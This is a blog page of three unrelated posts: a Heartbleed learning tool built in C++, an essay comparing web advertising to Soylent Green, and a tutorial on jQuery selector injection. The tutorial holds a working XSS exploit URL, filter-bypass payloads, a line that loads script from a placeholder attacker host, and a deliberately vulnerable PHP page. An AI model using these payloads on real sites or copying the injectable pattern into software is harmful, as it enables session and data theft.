
You taught me language, and my profit on’t

Is, I know how to curse: the red plague rid you,

For learning me your language!

– Caliban (The Tempest, I.ii.363-365)

The announcement of the Heartbleed vulnerability revealed a flaw in OpenSSL that could be exploited by a simple mechanism against a large population of targets to extract random memory from the victim. At worst, that pilfered memory would contain sensitive information like HTTP requests (with cookies, credentials, etc.) or even parts of the server’s private key. Or malicious servers could extract similarly sensitive data from vulnerable clients.

In the spirit of Caliban, Shakespeare’s freckled whelp, I combined a desire to learn about Heartbleed’s underpinnings with my ongoing experimentation with the new language features of C++11. The result is a demo tool named Hemorrhage.

Hemorrhage shows two different approaches to sending modified TLS heartbeats. One relies on the Boost.ASIO library to set up a TCP connection, then handles the SSL/TLS layer manually. The other uses a more complete adoption of Boost.ASIO and its asynchronous capabilities. It was this async aspect where C++11 really shone. Lambdas made setting up callbacks a pleasure — especially in terms of readability compared to prior techniques that required binds and placeholders.

Readable code is hackable (in the creation sense) code. Being able to declare variables with `auto` made code easier to read, especially when dealing with iterators. Although Hemorrhage only takes minimal advantage of `move` semantics and `unique_ptr`, they are currently my favorite aspects following lambdas and `auto`.

Hemorrhage itself is simple. Check out the README.md for more details about compiling it. (As long as you have Boost and OpenSSL it should be easy on Unix-based systems.)

The core of the tool is taking the `tls1_heartbeat()` function from OpenSSL’s `ssl/t1_lib.c` file and changing the payload length, essentially a one-line modification. Yet another approach might be to use the original `tls1_heartbeat()` function and modify the heartbeat data directly by manipulating the `SSL*` pointer’s `s3->wrec` data via `SSL_CTX_set_msg_callback()`.

In any case, the tool’s purpose was to “learn by implementing something” as opposed to crafting more insidious exploits against Heartbleed. That’s why I didn’t bother with more handshake protocols or STARTTLS. It did give me a better understanding of OpenSSL’s internals. But still, I’ll add my voice to the chorus bemoaning its readability.
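To make “changing the payload length” concrete, here is a rough sketch of a heartbeat request’s byte layout as described in RFC 6520. It is not Hemorrhage’s code (the tool is C++ and patches OpenSSL’s own function); it is written in JavaScript only to match the other examples on this page. The `buildHeartbeat` helper, the TLS 1.1 version bytes, and the zero-filled padding are assumptions made for illustration, and nothing here touches the network.

```javascript
// Sketch of a TLS heartbeat request (RFC 6520) as raw bytes.
// buildHeartbeat is a hypothetical helper; it opens no socket.
function buildHeartbeat(payload, claimedLength) {
  const PADDING = 16; // RFC 6520 requires at least 16 bytes of padding
  const body = new Uint8Array(3 + payload.length + PADDING);
  body[0] = 0x01;                        // HeartbeatMessageType: heartbeat_request
  body[1] = (claimedLength >> 8) & 0xff; // payload_length, high byte
  body[2] = claimedLength & 0xff;        // payload_length, low byte
  body.set(payload, 3);                  // real payload; padding is left as zeros here

  const record = new Uint8Array(5 + body.length);
  record[0] = 0x18;                      // TLS record content type 24: heartbeat
  record[1] = 0x03;                      // assumed protocol version: TLS 1.1 (0x0302)
  record[2] = 0x02;
  record[3] = (body.length >> 8) & 0xff; // record length reflects the bytes really sent
  record[4] = body.length & 0xff;
  record.set(body, 5);
  return record;
}

const payload = new TextEncoder().encode("ping");
const honest = buildHeartbeat(payload, payload.length); // claims 4 bytes, sends 4
const lying = buildHeartbeat(payload, 0x4000);          // claims 16384 bytes, sends 4
```

Both records are the same size on the wire. Only the two `payload_length` bytes differ, and a vulnerable peer trusts that field when it copies the payload back.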

• • •

Silicon Valley green is made of people. This is succinctly captured in the phrase: When you don’t pay for the product, the product is you. It explains how companies attain multi-billion dollar valuations despite offering their services for free. They promise revenue through the glorification of advertising.

Investors argue that high valuations reflect a company’s potential for growth. That growth comes from attracting new users. Those users in turn become targets for advertising. And sites, once bastions of clean design, become concoctions of user-generated content, ad banners, and sponsored features.

Population Growth

Sites measure their popularity by a single serving size: the user. Therefore, one way to interpret a company’s valuation is in its price per user. That is, how many calories can a site gain from a single serving? How many servings must it consume to become a hulking giant of the web?

You know where this is going.



The movie Soylent Green presented a future where a corporation provided seemingly beneficent services to a hungry world. It wasn’t the only story with themes of overpopulation and environmental catastrophe to emerge from the late ’60s and early ’70s. The movie was based on the novel Make Room! Make Room!, by Harry Harrison. And it had peers in John Brunner’s Stand on Zanzibar (and The Sheep Look Up) and Ursula K. Le Guin’s The Lathe of Heaven. These imagined worlds contained people powerful and poor. And they all had to feed.

A Furniture Arrangement

To sell is to feed. To feed is to buy.

In Soylent Green, Detective Thorn (Charlton Heston) visits an apartment to investigate the murder of a corporation’s board member, i.e. someone rich. He is unsurprised to encounter a woman there and, already knowing the answer, asks if she’s “the furniture.” It’s trivial to decipher this insinuation about a woman’s role in a world afflicted by overpopulation, famine, and disparate wealth. That an observation made in a movie forty years ago about a future ten years hence rings true today is distressing.

We are becoming products of web sites as we become targets for ads. But we are also becoming parts of those ads. Becoming furnishings for fancy apartments in a dystopian New York.

Women have been components of advertising for ages, selected as images relevant to manipulating a buyer no matter the irrelevance of their image to the product. That’s not changing. What is changing is some sites’ desire to turn all users into billboards. They want to create endorsements by you that target your friends. Your friends are as much a commodity as your information.

In this quest to build advertising revenue, sites also distill millions of users’ activity into individual recommendations of what they might want to buy or predictions of what they might be searching for.

And what a sludge that distillation produces.

There may be the occasional welcome discovery from a targeted ad, but there is also an unwelcome consequence of placing too much faith in algorithms. A few suggestions can become dominant viewpoints based more on others’ voices than personal preferences. More data does not always mean more accurate data.

We should not excuse algorithms as impartial oracles to society. They are tuned, after all. And those adjustments may reflect the bias and beliefs of the adjusters. For example, an ad campaign created for UN Women employed a simple premise: superimpose upon pictures of women a search engine’s autocomplete suggestions for phrases related to women. The result exposes biases reinforced by the louder voices of technology. More generally, a site can grow or die based on a search engine’s ranking. An algorithm collects data through a lens. It’s as important to know where the lens is not focused as where it is.

There is a point where information for services is no longer a fair trade. Where apps collect the maximum information to offer the minimum functionality. There should be more of a push for apps that invert that Information-to-Functionality relationship: the minimum information requested for the maximum functionality offered.

Going Home

In the movie, Sol (Edward G. Robinson) talks about going Home after a long life. Throughout the movie, Home is alluded to as the ultimate, welcoming destination. It’s a place of peace and respect. Home is where Sol reveals to Detective Thorn the infamous ingredient of Soylent Green.

Web sites want to be your home on the web. You’ll find them exhorting you to make their URL your browser’s homepage.

Web sites want your attention. They trade free services for personal information. At the very least, they want to sell your eyeballs. We’ve seen aggressive escalation of this in various privacy grabs, contact list pilfering, and weak apologies that “mistakes were made.”

More web sites and mobile apps are releasing features outright described as “creepy but cool” in the hope that the latter outweighs the former in a user’s mind. Services need not be expected to be free without some form of compensation; the Web doesn’t have to be uniformly altruistic. But there’s growing suspicion that personal information and privacy are being undervalued and under-protected by sites offering those services. There should be a balance between what a site offers to users and how much information it collects about users (and how long it keeps that information).

The Do Not Track effort fizzled, hobbled by indecision over a default setting. Browser makers have long encouraged default settings that favor stronger security, but they seem to have less consensus about what default privacy settings should be.

Third-party cookies will be devoured by progress; they are losing traction within the browser and mobile apps. Safari has long blocked them by default. Chrome has not. Mozilla has considered it. Their descendants may be cookie-less tracking mechanisms, which the web titans are already investigating. This isn’t necessarily a bad thing. Done well, a tracking mechanism can be limited to an app’s sandboxed perspective as opposed to full view of a device. Such a restriction can limit the correlation of a user’s activity, thereby tipping the balance back towards privacy.

If you rely on advertising to feed your company and you do not control the browser, you risk going hungry. For example, only Chrome embeds the Flash plugin. An eternally vulnerable plugin that coincidentally plays videos for a revenue-generating site.



There are few means to make the browser an agent that prioritizes a user’s desires over a site’s. The Ghostery plugin is one tracking countermeasure available for all major browsers. Mozilla’s Lightbeam experiment does not block tracking mechanisms by default; it reveals how interconnected tracking has become due to ubiquitous cookies.

Browsers are becoming more secure, but they need a site’s cooperation to protect personal information. At the very least, sites should be using HTTPS to protect traffic as it flows from browser to server. To do so is laudable yet insufficient for protecting data. And even this positive step moves slowly. Privacy on mobile devices moves perhaps even more slowly. The recent iOS 7 finally forbids apps from accessing a device’s unique identifier, while Android struggles to offer comprehensive tools.

The browser is Home. Apps are Home. These are places where processing takes on new connotations. This is where our data becomes their food.

Soylent Green’s year 2022 approaches. Humanity must know.

• • •

An ancient demon of web security skulks amongst all developers. It will live as long as there are people writing software. It is a subtle beast called by many names in many languages. But I call it Inicere, the Concatenator of Strings.

The demon’s sweet whispers of simplicity convince developers to commingle data with code — a mixture that produces insecure apps. Where its words promise effortless programming, its advice leads to flaws like SQL injection and cross-site scripting (aka HTML injection).

We have understood the danger of HTML injection ever since browsers rendered the first web sites decades ago. Developers naively took user-supplied data and wrote it into form fields, eliciting howls of delight from attackers who enjoyed demonstrating how to transform `<input value="abc">` into `<input value="abc"><script>alert(9)</script><"">`.

In response to this threat, heedful developers turned to the Litany of Output Transformation, which involved steps like applying HTML encoding and percent encoding to data being written to a web page. Thus, injection attacks become innocuous strings because the litany turns characters like angle brackets and quotation marks into representations like `%3C` and `&quot;` that have a different semantic identity within HTML.

But developers wanted to do more with their web sites. They wanted more complex JavaScript. They wanted the desktop in the browser. And as a consequence they’ve conjured new demons to corrupt our web apps. I have seen one such demon. And named it. For names have power.
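As a reminder of what the Litany of Output Transformation looks like in practice, here is a minimal sketch. The `encodeHtml` helper and its five-character entity table are assumptions made for illustration, not any particular framework’s API; `encodeURIComponent` is the standard built-in for percent encoding.

```javascript
// Hypothetical helper: HTML-encode the characters that matter inside an attribute value.
function encodeHtml(text) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => entities[ch]);
}

// The classic form-field attack string from the example above.
const attack = 'abc"><script>alert(9)</script><"';

// Encoded, the payload stays inside the value attribute as inert text.
const field = '<input value="' + encodeHtml(attack) + '">';

// Percent encoding is the counterpart for data written into URLs.
const percent = encodeURIComponent("<");

console.log(field);
console.log(percent);
```

The point is that encoding must match the context. This helper suits an HTML attribute value, but it does nothing for data written inside a `<script>` block, which is where the rest of this story takes place.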

Demons are vain. This one no less so than its predecessors. I continue to find it among JavaScript and jQuery. Its name is Selector the Almighty, Subjugator of Elements.

Here is a link that does not yet reveal the creature’s presence:

    https://website/productDetails.html?id=OFB&start=15&source=search

Yet in the response to this link, the word “search” has been reflected in a `.ready()` function block. It’s a common term, and the appearance could easily be a coincidence. But if we experiment with several `source` values, we confirm that the web app writes the parameter into the page.

    <script>
    $(document).ready(function() {
      $("#page-hdr h3").css("width","385px");
      $("#main-panel").addClass("search-wdth938");
    });
    </script>

A first step in crafting an exploit is to break out of a quoted string. A few probes indicate the site does not enforce any restrictions on the `source` parameter, possibly because the developers assumed it would not be tampered with; the value is always hard-coded among links within the site’s HTML.

After a few more experiments we come up with a viable exploit.

    https://website/productDetails.html?productId=OFB&start=15&source=%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search

We’ve followed all the good practices for creating a JavaScript exploit. It terminates all strings and scope blocks properly, and it leaves the remainder of the JavaScript with valid syntax. Thus, the page carries on as if nothing special has occurred.

    $(document).ready(function() {
      $("#page-hdr h3").css("width","385px");
      $("#main-panel").addClass("");});alert(9);(function(){$("#main-panel").addClass("search-wdth938");
    });

There’s nothing particularly special about the injection technique for this vuln. It’s a trivial, too-common case of string concatenation. But we were talking about demons. And once you’ve invoked one by its true name it must be appeased. It’s the right thing to do; demons have feelings, too.
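To check that the exploit URL above really does leave valid syntax behind, the concatenation can be replayed outside the browser. This is only a sketch: `renderReadyBlock` is a hypothetical stand-in for whatever server-side template builds the page, assumed here to paste the raw `source` value in front of `-wdth938`.

```javascript
// Hypothetical stand-in for the server-side template: it concatenates the raw
// source parameter into the class name, as the vulnerable page appears to do.
function renderReadyBlock(source) {
  return '$(document).ready(function() { ' +
    '$("#page-hdr h3").css("width","385px"); ' +
    '$("#main-panel").addClass("' + source + '-wdth938"); });';
}

// The percent-encoded source value taken from the exploit URL.
const raw = "%22);%7D);alert(9);(function()%7B$(%22%23main-panel%22).addClass(%22search";
const decoded = decodeURIComponent(raw);

const benign = renderReadyBlock("search");
const injected = renderReadyBlock(decoded);

// new Function() only parses the text; the result is never called, so nothing runs.
// A SyntaxError here would mean the payload left broken JavaScript behind.
new Function(injected);

console.log(benign);
console.log(injected);
```

The decoded payload closes the string, the `addClass()` call, and the `.ready()` callback, then opens a throwaway function expression to swallow the leftover `-wdth938");` and closing braces.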

Therefore, let’s focus on the exploit this time, instead of the vuln. The site’s developers have already laid out the implements for summoning an injection demon, so why don’t we force Selector to do our bidding?

Web hackers should be familiar with jQuery (and its primary DOM manipulation feature, the Selector) for several reasons. Its misuse can be a source of vulns, especially so-called “DOM-based XSS” that delivers HTML injection attacks via DOM properties. jQuery is a powerful, flexible library that provides capabilities you might need for an exploit. And its syntax can be leveraged to bypass weak filters looking for more common payloads that contain things like inline event handlers or explicit `<script>` tags.

In the previous examples, the exploit terminated the jQuery functions and inserted an `alert` pop-up. We can do better than that.

The jQuery Selector is more powerful than the CSS selector syntax. For one thing, it may create an element. The following example creates an `<img>` tag whose `onerror` handler executes yet more JavaScript. (We’ve already executed arbitrary JavaScript to conduct the exploit; this emphasizes the Selector’s power. It’s like a nested injection attack.)

    $("<img src='x' onerror=alert(9)>")

Or, we could create an element, then bind an event to it, as follows:

    $("<img src='x'>").on("error",function(){alert(9)});

We have all the power of JavaScript at our disposal to obfuscate the payload. For example, we might avoid literal `<` and `>` characters by taking them from strings within the page. The following example uses string indexes to extract the angle brackets from two different locations in order to build an `<img>` tag. (The indexes may differ depending on the page’s HTML; the technique is sound.)

    $("body").html()[1]+"img"+$("head").html()[$("head").html().length-2]

As an aside, there are many ways to build strings from JavaScript objects. It’s good to know these tricks because sometimes filters don’t outright block characters like `<` and `>`, but block them only in combination with other characters. Hence, you could put string concatenation to use along with the `source` property of a `RegExp` (regular expression) object. Even better, use the slash representation of `RegExp`, as follows:

    /</.source + "img" + />/.source

Or just ask Selector to give us the first `<img>` that’s already on the page, change its `src` attribute, and bind an `onerror` event. In the next example we use the Selector to obtain a collection of elements, then iterate through the collection with the `.each()` function. Since we specified a `:first` selector, the collection should only have one entry.

    $("img:first").each(function(k,o){o.src="x";o.onerror=function(){alert(9)}})

Maybe you wish to booby-trap the page with a function that executes when the user decides to leave. The following example uses a Selector on the `Window` object:

    $(window).unload(function(){alert(9)})

We have Selector at our mercy. As I’ve mentioned in other articles, make the page do the work of loading more JavaScript. The following example loads JavaScript from another origin. Remember to set Access-Control-Allow-Origin headers on the site you retrieve the script from. Otherwise, a modern browser will block the cross-origin request under its CORS checks.

    $.get("https://evil.site/attack.js")

I’ll save additional tricks for the future. For now, read through jQuery’s API documentation. Pay close attention to:

- Selectors, and how to name them.

- Events, and how to bind them.

- DOM nodes, and how to manipulate them.

- Ajax functions, and how to call them.
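Before moving on, the string-building tricks described earlier can be tried without a browser or jQuery. In this sketch, `bodyHtml` and `headHtml` are hypothetical stand-ins for what `$("body").html()` and `$("head").html()` might return; on a real page the useful indexes will differ.

```javascript
// Angle brackets recovered from the source property of RegExp literals.
const fromRegExp = /</.source + "img" + />/.source;

// The same characters produced from their character codes (60 and 62).
const fromCharCodes = String.fromCharCode(60) + "img" + String.fromCharCode(62);

// Hypothetical page markup: the second character of the body and the
// second-to-last character of the head happen to be angle brackets.
const bodyHtml = '\n<div id="main-panel"></div>\n';
const headHtml = '<meta charset="utf-8">\n';
const fromPage = bodyHtml[1] + "img" + headHtml[headHtml.length - 2];

console.log(fromRegExp, fromCharCodes, fromPage);
```

None of the three expressions contains a quoted `<` or `>`, yet each evaluates to the string `<img>`. That is why a filter that only looks for literal tags in the input offers little protection once script is already running.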

Selector claims the title of Almighty, but like all demons its vanity belies its weakness. As developers, we harness its power whenever we use jQuery. Yet it yearns to be free of restraint, awaiting the laziness and mistakes that summon Inicere, the Concatenator of Strings, that in turn releases Selector from the confines of its web app.

Oh, what’s that? You came here for instructions to exorcise the demons from your web app? You should already know the Rite of Filtering by heart and be able to recite from memory lessons from the Codex of Encoding.

We’ll review them in a moment. First, I have a ritual of my own to finish. What were those words? Klaatu, barada, …necktie?

p.s. It’s easy to reproduce the vulnerable HTML covered in this article. But remember, this was about leveraging jQuery to craft exploits. If you have a PHP installation handy, use the following code to play around with these ideas. You’ll need to download a local version of jQuery or point to a CDN. Just load the page in a browser, open the browser’s development console, and hack away!

    <?php $s = isset($_REQUEST['s']) ? $_REQUEST['s'] : 'defaultWidth'; ?>
    <!doctype html>
    <html>
    <head><meta charset="utf-8">
    <!-- /* jQuery Selector Injection Demo */ -->
    <script src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
    <script>
    $(document).ready(function(){
      $("#main-panel").addClass("<?php print $s;?>");
    })
    </script>
    </head>
    <body>
    <div id="main-panel">
      <a href="#" id="link1" class="foo">a link</a>
      <br>
      <form>
        <input type="hidden" id="csrf" name="_csrfToken" value="123">
        <input type="text" name="q" value=""><br>
        <input type="submit" value="Search">
      </form>
      <img id="footer" src="" alt="">
    </div>
    </body>
    </html>

• • •